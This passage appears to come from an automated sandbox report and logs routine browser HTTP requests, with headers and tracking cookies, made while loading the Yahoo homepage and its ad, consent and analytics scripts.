Source: global trafficHTTP traffic detected: GET /version/6.4.1/cmp.js HTTP/1.1Host: consent.cmp.oath.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oa/consent.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/PfuFkSI.w9qemWReAv.2kA--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a0026210-7f1b-11ef-92ab-b839323afb9a.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__rapid-worker-1.2.js HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/tQ8F_aqdd1MTiJBsUnvEUw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/35a87f10-7eff-11ef-b37e-1db661b209fc.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_td_api/beacon/performance?ybar-init_0=0.40000000002328306&ybar-mod-sidenav_0=2&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.5&ybar-mod-assistjs_0=3.1000000000058208&ybar-mod-adaptivenav_0=0.1999999999825377&ybar-account-init_0=0.7999999999883585&ybar-mail-init_0=1.3999999999941792&ybar-mod-navigation_0=15.10000000000582&ybar-mod-notification_0=0.39999999999417923&src=ybar&_rdn=857348&apptype=default&rid=1pa4ckpjflnfm&bucket=900%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/EP05qSSZkDRwnsJtEV.Bmw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/84608c70-7f17-11ef-bfc7-ce05e04ea18c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_td_api/beacon/performance?ybar-init_0=0.40000000002328306&ybar-mod-sidenav_0=2&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.5&ybar-mod-assistjs_0=3.1000000000058208&ybar-mod-adaptivenav_0=0.1999999999825377&ybar-account-init_0=0.7999999999883585&ybar-mail-init_0=1.3999999999941792&ybar-mod-navigation_0=15.10000000000582&ybar-mod-notification_0=0.39999999999417923&src=ybar&_rdn=857363&apptype=default&rid=1pa4ckpjflnfm&bucket=900%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/D1cC99bQYm9QVoUbD_Rpnw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_tech_153/03d01cbdd7ccafd738da286245b9f503.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ss/analytics-3.54.3.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/consentRecord?consentTypes=iab%2CiabCCPA%2Cgpp%2CgppSid HTTP/1.1Host: guce.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /uc/sf/0.1.434/js/safe.min.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__rapid-worker-1.2.js HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /aaq/benji/benji-2.1.123.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/img/icon-flame-light-202303010352.gif HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oa/consent.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/yahooweb-network/loader.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/benji/benji-2.1.123.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=2b2a262c-878f-3f65-9ba6-39ad37b780eb,b919e796-b03c-39fc-87e7-500abd2430fc,dce5eeb8-da4f-3016-b6b1-671a1b05f180,cc162679-b996-3b22-bf08-a33e637cd3e7,e83ce260-cc8d-4911-9251-00d71cd9beb8,877f8ab1-324b-3028-8015-3030372e4744,12f9c9af-c6c2-3c17-b79d-5f82604d80b2,9df6c4a7-8f43-3b8c-bc27-cbec371808d8,d6bedef8-7f7f-361b-a1ed-95df489e3d8b,17667347-cb18-3690-87e0-525837a669bf&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; 